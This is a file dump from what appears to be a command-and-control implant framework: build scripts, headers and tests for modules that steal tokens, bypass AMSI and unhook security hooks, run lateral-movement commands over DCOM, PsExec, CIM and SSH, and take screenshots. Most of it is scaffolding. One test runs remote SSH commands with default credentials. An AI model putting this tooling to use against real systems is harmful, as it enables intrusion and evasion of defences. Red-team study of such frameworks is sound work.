10 | $ "${CMAKE_SOURCE_DIR}/Release/Modules/$") 11 | 12 | if(C2CORE_BUILD_TESTS) 13 | add_executable(testsSpawnAs tests/testsSpawnAs.cpp SpawnAs.cpp) 14 | 15 | if(WIN32) 16 | target_link_libraries(testsSpawnAs ${Donut} advapi32 userenv) 17 | else() 18 | target_link_libraries(testsSpawnAs ${Donut} ${aplib64} ) 19 | endif() 20 | 21 | add_custom_command(TARGET testsSpawnAs POST_BUILD COMMAND ${CMAKE_COMMAND} -E copy 22 | $ "${CMAKE_SOURCE_DIR}/Tests/$") 23 | 24 | add_test(NAME testsSpawnAs COMMAND "${CMAKE_SOURCE_DIR}/Tests/$") 25 | endif() -------------------------------------------------------------------------------- /modules/EnumerateShares/CMakeLists.txt: -------------------------------------------------------------------------------- 1 | include_directories(../) 2 | add_library(EnumerateShares SHARED EnumerateShares.cpp) 3 | set_property(TARGET EnumerateShares PROPERTY MSVC_RUNTIME_LIBRARY "MultiThreaded") 4 | if(UNIX) 5 | target_link_libraries(EnumerateShares smbclient) 6 | endif() 7 | add_custom_command(TARGET EnumerateShares POST_BUILD COMMAND ${CMAKE_COMMAND} -E copy 8 | $ "${CMAKE_SOURCE_DIR}/Release/Modules/$") 9 | 10 | if(C2CORE_BUILD_TESTS) 11 | add_executable(testsEnumerateShares tests/testsEnumerateShares.cpp EnumerateShares.cpp) 12 | if(UNIX) 13 | target_link_libraries(testsEnumerateShares smbclient) 14 | endif() 15 | add_custom_command(TARGET testsEnumerateShares POST_BUILD COMMAND ${CMAKE_COMMAND} -E copy 16 | $ "${CMAKE_SOURCE_DIR}/Tests/$") 17 | add_test(NAME testsEnumerateShares COMMAND "${CMAKE_SOURCE_DIR}/Tests/$") 18 | endif() 19 | -------------------------------------------------------------------------------- /modules/PrintWorkingDirectory/CMakeLists.txt: -------------------------------------------------------------------------------- 1 | include_directories(../) 2 | add_library(PrintWorkingDirectory SHARED PrintWorkingDirectory.cpp) 3 | set_property(TARGET PrintWorkingDirectory PROPERTY MSVC_RUNTIME_LIBRARY "MultiThreaded") 4 | target_link_libraries(PrintWorkingDirectory ) 5 | add_custom_command(TARGET PrintWorkingDirectory POST_BUILD COMMAND ${CMAKE_COMMAND} -E copy 6 | $ "${CMAKE_SOURCE_DIR}/Release/Modules/$") 7 | 8 | if(C2CORE_BUILD_TESTS) 9 | add_executable(testsPrintWorkingDirectory tests/testsPrintWorkingDirectory.cpp PrintWorkingDirectory.cpp) 10 | target_link_libraries(testsPrintWorkingDirectory ) 11 | add_custom_command(TARGET testsPrintWorkingDirectory POST_BUILD COMMAND ${CMAKE_COMMAND} -E copy 12 | $ "${CMAKE_SOURCE_DIR}/Tests/$") 13 | 14 | add_test(NAME testsPrintWorkingDirectory COMMAND "${CMAKE_SOURCE_DIR}/Tests/$") 15 | endif() -------------------------------------------------------------------------------- /modules/PrintWorkingDirectory/tests/testsPrintWorkingDirectory.cpp: -------------------------------------------------------------------------------- 1 | #include "../PrintWorkingDirectory.hpp" 2 | 3 | #include 4 | 5 | bool testPrintWorkingDirectory(); 6 | 7 | int main() 8 | { 9 | bool res; 10 | 11 | std::cout << "[+] testPrintWorkingDirectory" << std::endl; 12 | res = testPrintWorkingDirectory(); 13 | if (res) 14 | std::cout << "[+] Sucess" << std::endl; 15 | else 16 | std::cout << "[-] Failed" << std::endl; 17 | 18 | return !res; 19 | } 20 | 21 | bool testPrintWorkingDirectory() 22 | { 23 | std::unique_ptr printWorkingDirectory = std::make_unique(); 24 | 25 | std::vector splitedCmd; 26 | splitedCmd.push_back("pwd"); 27 | 28 | C2Message c2Message; 29 | C2Message c2RetMessage; 30 | printWorkingDirectory->init(splitedCmd, c2Message); 31 | printWorkingDirectory->process(c2Message, c2RetMessage); 32 | 33 | std::string expected = std::filesystem::current_path().string(); 34 | return c2RetMessage.returnvalue() == expected; 35 | } 36 | -------------------------------------------------------------------------------- /modules/Download/Download.hpp: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include "ModuleCmd.hpp" 4 | 5 | 6 | class Download : public ModuleCmd 7 | { 8 | 9 | public: 10 | Download(); 11 | ~Download(); 12 | 13 | std::string getInfo(); 14 | 15 | int init(std::vector& splitedCmd, C2Message& c2Message); 16 | int recurringExec(C2Message& c2RetMessage); 17 | int process(C2Message& c2Message, C2Message& c2RetMessage); 18 | int followUp(const C2Message &c2RetMessage); 19 | int errorCodeToMsg(const C2Message &c2RetMessage, std::string& errorMsg); 20 | int osCompatibility() 21 | { 22 | return OS_LINUX | OS_WINDOWS; 23 | } 24 | 25 | private: 26 | std::string m_outputfile; 27 | std::ofstream m_output; 28 | std::ifstream m_input; 29 | std::streamsize m_fileSize; 30 | std::streamsize m_bytesRead; 31 | }; 32 | 33 | 34 | #ifdef _WIN32 35 | 36 | extern "C" __declspec(dllexport) Download * DownloadConstructor(); 37 | 38 | #else 39 | 40 | extern "C" __attribute__((visibility("default"))) Download * DownloadConstructor(); 41 | 42 | #endif 43 | -------------------------------------------------------------------------------- /modules/CoffLoader/CMakeLists.txt: -------------------------------------------------------------------------------- 1 | include_directories(../) 2 | add_library(Coff SHARED CoffLoader.cpp) 3 | set_property(TARGET Coff PROPERTY MSVC_RUNTIME_LIBRARY "MultiThreaded") 4 | if(WIN32) 5 | target_link_libraries(Coff CoffLoader CoffPacker ) 6 | else() 7 | endif() 8 | add_custom_command(TARGET Coff POST_BUILD COMMAND ${CMAKE_COMMAND} -E copy 9 | $ "${CMAKE_SOURCE_DIR}/Release/Modules/$") 10 | 11 | if(C2CORE_BUILD_TESTS) 12 | add_executable(testsCoffLoader tests/testsCoffLoader.cpp CoffLoader.cpp) 13 | 14 | if(WIN32) 15 | set_property(TARGET testsCoffLoader PROPERTY MSVC_RUNTIME_LIBRARY "MultiThreaded") 16 | target_link_libraries(testsCoffLoader CoffLoader CoffPacker ) 17 | else() 18 | endif() 19 | 20 | add_custom_command(TARGET testsCoffLoader POST_BUILD COMMAND ${CMAKE_COMMAND} -E copy 21 | $ "${CMAKE_SOURCE_DIR}/Tests/$") 22 | 23 | add_test(NAME testsCoffLoader COMMAND "${CMAKE_SOURCE_DIR}/Tests/$") 24 | endif() -------------------------------------------------------------------------------- /modules/Rev2self/tests/testsRev2self.cpp: -------------------------------------------------------------------------------- 1 | #include "../Rev2self.hpp" 2 | 3 | #ifdef __linux__ 4 | #elif _WIN32 5 | #include 6 | #endif 7 | 8 | bool testRev2self(); 9 | 10 | int main() 11 | { 12 | bool res; 13 | 14 | std::cout << "[+] testRev2self" << std::endl; 15 | res = testRev2self(); 16 | if (res) 17 | std::cout << "[+] Sucess" << std::endl; 18 | else 19 | std::cout << "[-] Failed" << std::endl; 20 | 21 | return 0; 22 | } 23 | 24 | bool testRev2self() 25 | { 26 | std::unique_ptr rev2self = std::make_unique(); 27 | { 28 | std::vector splitedCmd; 29 | splitedCmd.push_back("rev2self"); 30 | 31 | C2Message c2Message; 32 | C2Message c2RetMessage; 33 | rev2self->init(splitedCmd, c2Message); 34 | rev2self->process(c2Message, c2RetMessage); 35 | 36 | std::string output = "\n\noutput:\n"; 37 | output += c2RetMessage.returnvalue(); 38 | output += "\n"; 39 | std::cout << output << std::endl; 40 | } 41 | 42 | return true; 43 | } 44 | -------------------------------------------------------------------------------- /modules/Registry/CMakeLists.txt: -------------------------------------------------------------------------------- 1 | include_directories(../) 2 | add_library(Registry SHARED Registry.cpp) 3 | set_property(TARGET Registry PROPERTY MSVC_RUNTIME_LIBRARY "MultiThreaded") 4 | if (WIN32) 5 | target_compile_definitions(Registry PRIVATE _WIN32_WINNT=0x0601) 6 | target_link_libraries(Registry PRIVATE Advapi32) 7 | endif() 8 | add_custom_command(TARGET Registry POST_BUILD COMMAND ${CMAKE_COMMAND} -E copy 9 | $ "${CMAKE_SOURCE_DIR}/Release/Modules/$") 10 | 11 | if(C2CORE_BUILD_TESTS) 12 | add_executable(testsRegistry tests/testsRegistry.cpp Registry.cpp) 13 | if (WIN32) 14 | target_compile_definitions(testsRegistry PRIVATE _WIN32_WINNT=0x0601) 15 | target_link_libraries(testsRegistry PRIVATE Advapi32) 16 | endif() 17 | add_custom_command(TARGET testsRegistry POST_BUILD COMMAND ${CMAKE_COMMAND} -E copy 18 | $ "${CMAKE_SOURCE_DIR}/Tests/$") 19 | 20 | add_test(NAME testsRegistry COMMAND "${CMAKE_SOURCE_DIR}/Tests/$") 21 | endif() 22 | -------------------------------------------------------------------------------- /modules/DcomExec/CMakeLists.txt: -------------------------------------------------------------------------------- 1 | include_directories(../) 2 | add_library(DcomExec SHARED DcomExec.cpp) 3 | set_property(TARGET DcomExec PROPERTY MSVC_RUNTIME_LIBRARY "MultiThreaded") 4 | if (WIN32) 5 | target_compile_definitions(DcomExec PRIVATE _WIN32_WINNT=0x0601) 6 | target_link_libraries(DcomExec PRIVATE ole32 oleaut32) 7 | endif() 8 | add_custom_command(TARGET DcomExec POST_BUILD COMMAND ${CMAKE_COMMAND} -E copy 9 | $ "${CMAKE_SOURCE_DIR}/Release/Modules/$") 10 | 11 | if(C2CORE_BUILD_TESTS) 12 | add_executable(testsDcomExec tests/testsDcomExec.cpp DcomExec.cpp) 13 | if (WIN32) 14 | target_compile_definitions(testsDcomExec PRIVATE _WIN32_WINNT=0x0601) 15 | target_link_libraries(testsDcomExec PRIVATE ole32 oleaut32) 16 | endif() 17 | add_custom_command(TARGET testsDcomExec POST_BUILD COMMAND ${CMAKE_COMMAND} -E copy 18 | $ "${CMAKE_SOURCE_DIR}/Tests/$") 19 | 20 | add_test(NAME testsDcomExec COMMAND "${CMAKE_SOURCE_DIR}/Tests/$") 21 | endif() 22 | -------------------------------------------------------------------------------- /modules/ListProcesses/tests/testsListProcesses.cpp: -------------------------------------------------------------------------------- 1 | #include "../ListProcesses.hpp" 2 | 3 | #ifdef __linux__ 4 | #elif _WIN32 5 | #include 6 | #endif 7 | 8 | bool testListProcesses(); 9 | 10 | int main() 11 | { 12 | bool res; 13 | 14 | std::cout << "[+] testListProcesses" << std::endl; 15 | res = testListProcesses(); 16 | if (res) 17 | std::cout << "[+] Sucess" << std::endl; 18 | else 19 | std::cout << "[-] Failed" << std::endl; 20 | 21 | return 0; 22 | } 23 | 24 | bool testListProcesses() 25 | { 26 | std::unique_ptr listProcesses = std::make_unique(); 27 | { 28 | std::vector splitedCmd; 29 | splitedCmd.push_back("ps"); 30 | 31 | C2Message c2Message; 32 | C2Message c2RetMessage; 33 | listProcesses->init(splitedCmd, c2Message); 34 | listProcesses->process(c2Message, c2RetMessage); 35 | 36 | std::string output = "\n\noutput:\n"; 37 | output += c2RetMessage.returnvalue(); 38 | output += "\n"; 39 | std::cout << output << std::endl; 40 | } 41 | 42 | return true; 43 | } 44 | -------------------------------------------------------------------------------- /modules/ModuleCmd/tests/testsTools.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | 6 | #include "../Tools.hpp" 7 | 8 | 9 | int testGetRemoteProcAddress() 10 | { 11 | #ifdef _WIN32 12 | int pid = launchProcess("C:\\Windows\\System32\\notepad.exe"); 13 | std::cout << "notepad pid " << pid << std::endl; 14 | 15 | HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, TRUE, pid); 16 | std::cout << "notepad hProcess " << hProcess << std::endl; 17 | 18 | assert(hProcess != 0); 19 | 20 | Sleep(100); 21 | 22 | HMODULE hModule = GetRemoteModuleHandle(hProcess, "ntdll.dll"); 23 | std::cout << "notepad ntdll.dll HMODULE " << hModule << std::endl; 24 | 25 | assert(hModule != 0); 26 | 27 | FARPROC proc = GetRemoteProcAddress (hProcess, hModule, "EtwEventWrite", 0, FALSE); 28 | std::cout << "notepad ntdll.dll,EtwEventWrite FARPROC " << proc << std::endl; 29 | 30 | assert(proc != 0); 31 | 32 | TerminateProcess(hProcess, 1); 33 | CloseHandle(hProcess); 34 | #endif 35 | 36 | return 0; 37 | } 38 | 39 | 40 | int main() 41 | { 42 | testGetRemoteProcAddress(); 43 | } -------------------------------------------------------------------------------- /modules/Shell/Shell.hpp: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #ifdef _WIN32 4 | #include 5 | #endif 6 | 7 | #include "ModuleCmd.hpp" 8 | 9 | class Shell : public ModuleCmd 10 | { 11 | public: 12 | Shell(); 13 | ~Shell(); 14 | 15 | std::string getInfo(); 16 | 17 | int init(std::vector& splitedCmd, C2Message& c2Message); 18 | int process(C2Message& c2Message, C2Message& c2RetMessage); 19 | int followUp(const C2Message &c2RetMessage); 20 | int errorCodeToMsg(const C2Message &c2RetMessage, std::string& errorMsg); 21 | int osCompatibility() 22 | { 23 | return OS_LINUX | OS_WINDOWS; 24 | } 25 | 26 | private: 27 | int startShell(); 28 | void stopShell(); 29 | 30 | #ifdef _WIN32 31 | HANDLE m_hChildStdoutRd; 32 | HANDLE m_hChildStdinWr; 33 | PROCESS_INFORMATION m_pi; 34 | #else 35 | int m_masterFd; 36 | pid_t m_pid; 37 | #endif 38 | std::string m_program; 39 | bool m_started; 40 | }; 41 | 42 | #ifdef _WIN32 43 | extern "C" __declspec(dllexport) Shell * ShellConstructor(); 44 | #else 45 | extern "C" __attribute__((visibility("default"))) Shell * ShellConstructor(); 46 | #endif 47 | -------------------------------------------------------------------------------- /modules/StealToken/tests/testsStealToken.cpp: -------------------------------------------------------------------------------- 1 | #include "../StealToken.hpp" 2 | 3 | #ifdef __linux__ 4 | #elif _WIN32 5 | #include 6 | #endif 7 | 8 | bool testStealToken(); 9 | 10 | int main() 11 | { 12 | bool res; 13 | 14 | std::cout << "[+] testStealToken" << std::endl; 15 | res = testStealToken(); 16 | if (res) 17 | std::cout << "[+] Sucess" << std::endl; 18 | else 19 | std::cout << "[-] Failed" << std::endl; 20 | 21 | return 0; 22 | } 23 | 24 | bool testStealToken() 25 | { 26 | std::unique_ptr stealToken = std::make_unique(); 27 | { 28 | std::vector splitedCmd; 29 | splitedCmd.push_back("stealToken"); 30 | splitedCmd.push_back("44"); 31 | 32 | C2Message c2Message; 33 | C2Message c2RetMessage; 34 | stealToken->init(splitedCmd, c2Message); 35 | stealToken->process(c2Message, c2RetMessage); 36 | 37 | std::string output = "\n\noutput:\n"; 38 | output += c2RetMessage.returnvalue(); 39 | output += "\n"; 40 | std::cout << output << std::endl; 41 | } 42 | 43 | return true; 44 | } 45 | -------------------------------------------------------------------------------- /modules/TaskScheduler/CMakeLists.txt: -------------------------------------------------------------------------------- 1 | include_directories(../) 2 | add_library(TaskScheduler SHARED TaskScheduler.cpp) 3 | set_property(TARGET TaskScheduler PROPERTY MSVC_RUNTIME_LIBRARY "MultiThreaded") 4 | if (WIN32) 5 | target_compile_definitions(TaskScheduler PRIVATE _WIN32_WINNT=0x0601) 6 | target_link_libraries(TaskScheduler PRIVATE Taskschd) 7 | endif() 8 | add_custom_command(TARGET TaskScheduler POST_BUILD COMMAND ${CMAKE_COMMAND} -E copy 9 | $ "${CMAKE_SOURCE_DIR}/Release/Modules/$") 10 | 11 | if(C2CORE_BUILD_TESTS) 12 | add_executable(testsTaskScheduler tests/testsTaskScheduler.cpp TaskScheduler.cpp) 13 | if (WIN32) 14 | target_compile_definitions(testsTaskScheduler PRIVATE _WIN32_WINNT=0x0601) 15 | target_link_libraries(testsTaskScheduler PRIVATE Taskschd) 16 | endif() 17 | add_custom_command(TARGET testsTaskScheduler POST_BUILD COMMAND ${CMAKE_COMMAND} -E copy 18 | $ "${CMAKE_SOURCE_DIR}/Tests/$") 19 | 20 | add_test(NAME testsTaskScheduler COMMAND "${CMAKE_SOURCE_DIR}/Tests/$") 21 | endif() 22 | -------------------------------------------------------------------------------- /modules/ScreenShot/tests/testsScreenShot.cpp: -------------------------------------------------------------------------------- 1 | #include "../ScreenShot.hpp" 2 | 3 | #ifdef __linux__ 4 | #elif _WIN32 5 | #include 6 | #endif 7 | 8 | bool testScreenShot(); 9 | 10 | int main() 11 | { 12 | bool res; 13 | 14 | std::cout << "[+] testScreenShot" << std::endl; 15 | res = testScreenShot(); 16 | if (res) 17 | std::cout << "[+] Sucess" << std::endl; 18 | else 19 | std::cout << "[-] Failed" << std::endl; 20 | 21 | return 0; 22 | } 23 | 24 | bool testScreenShot() 25 | { 26 | std::ofstream outfile("test1.txt"); 27 | outfile << "testScreenShot" << std::endl; 28 | outfile.close(); 29 | 30 | std::unique_ptr screenShot = std::make_unique(); 31 | { 32 | std::vector splitedCmd; 33 | splitedCmd.push_back("screenShot"); 34 | 35 | C2Message c2Message; 36 | C2Message c2RetMessage; 37 | screenShot->init(splitedCmd, c2Message); 38 | screenShot->process(c2Message, c2RetMessage); 39 | 40 | std::string output = "\n\noutput:\n"; 41 | output += c2RetMessage.returnvalue(); 42 | output += "\n"; 43 | std::cout << output << std::endl; 44 | } 45 | 46 | 47 | return true; 48 | } 49 | -------------------------------------------------------------------------------- /modules/Evasion/Evasion.hpp: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include "ModuleCmd.hpp" 4 | 5 | 6 | class Evasion : public ModuleCmd 7 | { 8 | 9 | public: 10 | Evasion(); 11 | ~Evasion(); 12 | 13 | std::string getInfo(); 14 | 15 | int init(std::vector& splitedCmd, C2Message& c2Message); 16 | int process(C2Message& c2Message, C2Message& c2RetMessage); 17 | int osCompatibility() 18 | { 19 | return OS_WINDOWS; 20 | } 21 | 22 | private: 23 | 24 | #ifdef _WIN32 25 | int checkHooks(std::string& result); 26 | int unhookFreshCopy(std::string& result); 27 | int unhookPerunsFart(std::string& result); 28 | int amsiBypass(std::string& result); 29 | int introspection(std::string& result, std::string& moduleName); 30 | int patchMemory(std::string& result, const std::string& hexAddress, const std::string& patch); 31 | int readMemory(std::string& result, const std::string& hexAddress, const int size); 32 | int remotePatch(std::string& result); 33 | #endif 34 | 35 | }; 36 | 37 | 38 | #ifdef _WIN32 39 | 40 | extern "C" __declspec(dllexport) Evasion * A_EvasionConstructor(); 41 | 42 | #else 43 | 44 | extern "C" __attribute__((visibility("default"))) Evasion * EvasionConstructor(); 45 | 46 | #endif 47 | -------------------------------------------------------------------------------- /modules/PwSh/AssemblyManager.hpp: -------------------------------------------------------------------------------- 1 | #pragma once 2 | #include "AssemblyStore.hpp" 3 | 4 | 5 | class MyAssemblyManager : public IHostAssemblyManager 6 | { 7 | public: 8 | MyAssemblyManager(void); 9 | ~MyAssemblyManager(void); 10 | 11 | virtual HRESULT STDMETHODCALLTYPE QueryInterface(REFIID riid,void **ppv); 12 | virtual ULONG STDMETHODCALLTYPE AddRef(void); 13 | virtual ULONG STDMETHODCALLTYPE Release(void); 14 | 15 | virtual HRESULT STDMETHODCALLTYPE GetNonHostStoreAssemblies(ICLRAssemblyReferenceList** ppReferenceList); 16 | virtual HRESULT STDMETHODCALLTYPE GetAssemblyStore(IHostAssemblyStore** ppAssemblyStore); 17 | 18 | int setTargetAssembly(TargetAssembly * targetAssembly) 19 | { 20 | m_assemblyStore->setTargetAssembly(targetAssembly); 21 | return 0; 22 | } 23 | 24 | int updateTargetAssembly(ICLRAssemblyIdentityManager* identityManager, const std::string& data) 25 | { 26 | m_assemblyStore->updateTargetAssembly(identityManager, data); 27 | return 0; 28 | } 29 | 30 | LPWSTR getAssemblyInfo() 31 | { 32 | return m_assemblyStore->getAssemblyInfo(); 33 | }; 34 | 35 | protected: 36 | DWORD count; 37 | 38 | private: 39 | MyAssemblyStore* m_assemblyStore; 40 | 41 | }; -------------------------------------------------------------------------------- /modules/DotnetExec/AssemblyManager.hpp: -------------------------------------------------------------------------------- 1 | #pragma once 2 | #include "AssemblyStore.hpp" 3 | 4 | 5 | class MyAssemblyManager : public IHostAssemblyManager 6 | { 7 | public: 8 | MyAssemblyManager(void); 9 | ~MyAssemblyManager(void); 10 | 11 | virtual HRESULT STDMETHODCALLTYPE QueryInterface(REFIID riid,void **ppv); 12 | virtual ULONG STDMETHODCALLTYPE AddRef(void); 13 | virtual ULONG STDMETHODCALLTYPE Release(void); 14 | 15 | virtual HRESULT STDMETHODCALLTYPE GetNonHostStoreAssemblies(ICLRAssemblyReferenceList** ppReferenceList); 16 | virtual HRESULT STDMETHODCALLTYPE GetAssemblyStore(IHostAssemblyStore** ppAssemblyStore); 17 | 18 | int setTargetAssembly(TargetAssembly * targetAssembly) 19 | { 20 | m_assemblyStore->setTargetAssembly(targetAssembly); 21 | return 0; 22 | } 23 | 24 | int updateTargetAssembly(ICLRAssemblyIdentityManager* identityManager, const std::string& data) 25 | { 26 | m_assemblyStore->updateTargetAssembly(identityManager, data); 27 | return 0; 28 | } 29 | 30 | LPWSTR getAssemblyInfo() 31 | { 32 | return m_assemblyStore->getAssemblyInfo(); 33 | }; 34 | 35 | protected: 36 | DWORD count; 37 | 38 | private: 39 | MyAssemblyStore* m_assemblyStore; 40 | 41 | }; -------------------------------------------------------------------------------- /modules/SshExec/CMakeLists.txt: -------------------------------------------------------------------------------- 1 | include_directories(../) 2 | add_library(SshExec SHARED SshExec.cpp) 3 | set_property(TARGET SshExec PROPERTY MSVC_RUNTIME_LIBRARY "MultiThreaded") 4 | 5 | # Link against libssh2 and its dependencies 6 | target_link_libraries(SshExec PRIVATE libssh2_static) 7 | 8 | # Windows-specific dependencies 9 | if (WIN32) 10 | target_link_libraries(SshExec PRIVATE 11 | ws2_32 12 | crypt32 13 | bcrypt 14 | ) 15 | endif() 16 | 17 | 18 | add_custom_command(TARGET SshExec POST_BUILD COMMAND ${CMAKE_COMMAND} -E copy 19 | $ "${CMAKE_SOURCE_DIR}/Release/Modules/$") 20 | 21 | if(C2CORE_BUILD_TESTS) 22 | add_executable(testsSshExec tests/testsSshExec.cpp SshExec.cpp) 23 | target_link_libraries(testsSshExec PRIVATE libssh2_static) 24 | if (WIN32) 25 | target_link_libraries(testsSshExec PRIVATE 26 | ws2_32 27 | crypt32 28 | bcrypt 29 | ) 30 | endif() 31 | add_custom_command(TARGET testsSshExec POST_BUILD COMMAND ${CMAKE_COMMAND} -E copy 32 | $ "${CMAKE_SOURCE_DIR}/Tests/$") 33 | add_test(NAME testsSshExec COMMAND "${CMAKE_SOURCE_DIR}/Tests/$") 34 | endif() -------------------------------------------------------------------------------- /modules/CimExec/CimExec.hpp: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include "ModuleCmd.hpp" 4 | 5 | #include 6 | #include 7 | 8 | class CimExec : public ModuleCmd 9 | { 10 | public: 11 | CimExec(); 12 | ~CimExec(); 13 | 14 | std::string getInfo(); 15 | 16 | int init(std::vector& splitedCmd, C2Message& c2Message); 17 | int process(C2Message& c2Message, C2Message& c2RetMessage); 18 | int errorCodeToMsg(const C2Message& c2RetMessage, std::string& errorMsg); 19 | 20 | int osCompatibility() 21 | { 22 | return OS_WINDOWS; 23 | } 24 | 25 | private: 26 | struct Parameters 27 | { 28 | std::string hostname; 29 | std::string namespaceName; 30 | std::string command; 31 | std::string arguments; 32 | std::string username; 33 | std::string password; 34 | }; 35 | 36 | std::string packParameters(const Parameters& params) const; 37 | Parameters unpackParameters(const std::string& data) const; 38 | 39 | #ifdef _WIN32 40 | int invoke(const Parameters& params, std::string& result) const; 41 | #endif 42 | }; 43 | 44 | #ifdef _WIN32 45 | extern "C" __declspec(dllexport) CimExec* CimExecConstructor(); 46 | #else 47 | extern "C" __attribute__((visibility("default"))) CimExec* CimExecConstructor(); 48 | #endif 49 | -------------------------------------------------------------------------------- /modules/Powershell/PowerShellRunner/New-PowerShellRunnerHeader.ps1: -------------------------------------------------------------------------------- 1 | function New-PowerShellRunnerHeader 2 | { 3 | [CmdletBinding()] 4 | [OutputType([string])] 5 | Param 6 | ( 7 | [Parameter(Mandatory=$true, 8 | ValueFromPipelineByPropertyName=$true, 9 | Position=0)] 10 | $AssemblyPath 11 | ) 12 | 13 | write-output $AssemblyPath 14 | $Bytes = Get-Content -Raw -Encoding Byte $AssemblyPath 15 | $OutputStr = New-Object System.Text.StringBuilder 16 | 17 | write-output $OutputStr 18 | 19 | $Counter = 1 20 | foreach($Byte in $Bytes) { 21 | $null = $OutputStr.Append("0x$('{0:X2}' -f $Byte),") 22 | 23 | if($Counter % 12 -eq 0) { 24 | $null = $OutputStr.AppendLine() 25 | $null = $OutputStr.Append("`t") 26 | } 27 | $Counter++ 28 | } 29 | 30 | $null = $OutputStr.Remove($OutputStr.Length-1,1) 31 | 32 | $Source = @" 33 | #ifndef POWERSHELLRUNNERDLL_H_ 34 | #define POWERSHELLRUNNERDLL_H_ 35 | 36 | static const unsigned char PowerShellRunner_dll[] = { 37 | $($OutputStr.ToString()) 38 | }; 39 | 40 | static const unsigned int PowerShellRunner_dll_len = $($Bytes.Length); 41 | 42 | #endif 43 | "@ 44 | 45 | $Source | Out-File -FilePath header.h 46 | } 47 | 48 | New-PowerShellRunnerHeader .\PowerShellRunner.dll -------------------------------------------------------------------------------- /modules/CoffLoader/tests/testsCoffLoader.cpp: -------------------------------------------------------------------------------- 1 | #include "../CoffLoader.hpp" 2 | 3 | #ifdef __linux__ 4 | #elif _WIN32 5 | #include 6 | #endif 7 | 8 | bool testCoffLoader(); 9 | 10 | int main() 11 | { 12 | bool res; 13 | 14 | std::cout << "[+] testCoffLoader" << std::endl; 15 | res = testCoffLoader(); 16 | if (res) 17 | std::cout << "[+] Sucess" << std::endl; 18 | else 19 | std::cout << "[-] Failed" << std::endl; 20 | 21 | return 0; 22 | } 23 | 24 | bool testCoffLoader() 25 | { 26 | std::unique_ptr coffLoader = std::make_unique(); 27 | { 28 | std::vector splitedCmd; 29 | splitedCmd.push_back("coffLoader"); 30 | splitedCmd.push_back(".\\dir.x64.o"); 31 | splitedCmd.push_back("go"); 32 | splitedCmd.push_back("Zs"); 33 | splitedCmd.push_back("c:\\"); 34 | splitedCmd.push_back("0"); 35 | 36 | C2Message c2Message; 37 | C2Message c2RetMessage; 38 | coffLoader->init(splitedCmd, c2Message); 39 | coffLoader->process(c2Message, c2RetMessage); 40 | 41 | std::string output = "\n\noutput:\n"; 42 | output += c2RetMessage.returnvalue(); 43 | output += "\n"; 44 | std::cout << output << std::endl; 45 | } 46 | 47 | return true; 48 | } 49 | -------------------------------------------------------------------------------- /modules/PsExec/CMakeLists.txt: -------------------------------------------------------------------------------- 1 | include_directories(../) 2 | add_library(PsExec SHARED PsExec.cpp) 3 | set_property(TARGET PsExec PROPERTY MSVC_RUNTIME_LIBRARY "MultiThreaded") 4 | target_link_libraries(PsExec ) 5 | add_custom_command(TARGET PsExec POST_BUILD COMMAND ${CMAKE_COMMAND} -E copy 6 | $ "${CMAKE_SOURCE_DIR}/Release/Modules/$") 7 | 8 | if(C2CORE_BUILD_TESTS) 9 | # PsExec test 10 | add_executable(testsPsExec tests/testsPsExec.cpp PsExec.cpp) 11 | target_link_libraries(testsPsExec ) 12 | add_custom_command(TARGET testsPsExec POST_BUILD COMMAND ${CMAKE_COMMAND} -E copy 13 | $ "${CMAKE_SOURCE_DIR}/Tests/$") 14 | 15 | add_test(NAME testsPsExec COMMAND "${CMAKE_SOURCE_DIR}/Tests/$") 16 | 17 | if (WIN32) 18 | 19 | # TestService 20 | add_executable(TestService tests/TestService.cpp) 21 | target_link_libraries(TestService PRIVATE 22 | advapi32 23 | ) 24 | add_custom_command(TARGET TestService POST_BUILD 25 | COMMAND ${CMAKE_COMMAND} -E copy 26 | $ 27 | "${CMAKE_SOURCE_DIR}/Tests/$" 28 | ) 29 | 30 | endif (WIN32) 31 | 32 | endif() -------------------------------------------------------------------------------- /modules/EnumerateRdpSessions/CMakeLists.txt: -------------------------------------------------------------------------------- 1 | include_directories(../) 2 | add_library(EnumerateRdpSessions SHARED EnumerateRdpSessions.cpp) 3 | set_property(TARGET EnumerateRdpSessions PROPERTY MSVC_RUNTIME_LIBRARY "MultiThreaded") 4 | if (WIN32) 5 | target_compile_definitions(EnumerateRdpSessions PRIVATE _WIN32_WINNT=0x0601) 6 | target_link_libraries(EnumerateRdpSessions PRIVATE Wtsapi32) 7 | endif() 8 | add_custom_command(TARGET EnumerateRdpSessions POST_BUILD COMMAND ${CMAKE_COMMAND} -E copy 9 | $ "${CMAKE_SOURCE_DIR}/Release/Modules/$") 10 | 11 | if(C2CORE_BUILD_TESTS) 12 | add_executable(testsEnumerateRdpSessions tests/testsEnumerateRdpSessions.cpp EnumerateRdpSessions.cpp) 13 | if (WIN32) 14 | target_compile_definitions(testsEnumerateRdpSessions PRIVATE _WIN32_WINNT=0x0601) 15 | target_link_libraries(testsEnumerateRdpSessions PRIVATE Wtsapi32) 16 | endif() 17 | add_custom_command(TARGET testsEnumerateRdpSessions POST_BUILD COMMAND ${CMAKE_COMMAND} -E copy 18 | $ "${CMAKE_SOURCE_DIR}/Tests/$") 19 | 20 | add_test(NAME testsEnumerateRdpSessions COMMAND "${CMAKE_SOURCE_DIR}/Tests/$") 21 | endif() 22 | -------------------------------------------------------------------------------- /modules/SshExec/tests/testsSshExec.cpp: -------------------------------------------------------------------------------- 1 | #include "../SshExec.hpp" 2 | 3 | #include 4 | #include 5 | #include 6 | 7 | int main() 8 | { 9 | { 10 | std::unique_ptr module = std::make_unique(); 11 | std::vector cmd = {"sshExec", "-h", "192.168.1.21", "-u", "kali", "-p", "kali", "whoami"}; 12 | C2Message message; 13 | C2Message ret; 14 | 15 | module->init(cmd, message); 16 | module->process(message, ret); 17 | 18 | std::string errMsg; 19 | module->errorCodeToMsg(ret, errMsg); 20 | 21 | std::cout << ret.returnvalue() << std::endl; 22 | std::cerr << errMsg << std::endl; 23 | } 24 | 25 | { 26 | std::unique_ptr module = std::make_unique(); 27 | std::vector cmd = {"sshExec", "-h", "192.168.1.12", "-u", "root", "-p", "root", "whoami"}; 28 | C2Message message; 29 | C2Message ret; 30 | 31 | module->init(cmd, message); 32 | module->process(message, ret); 33 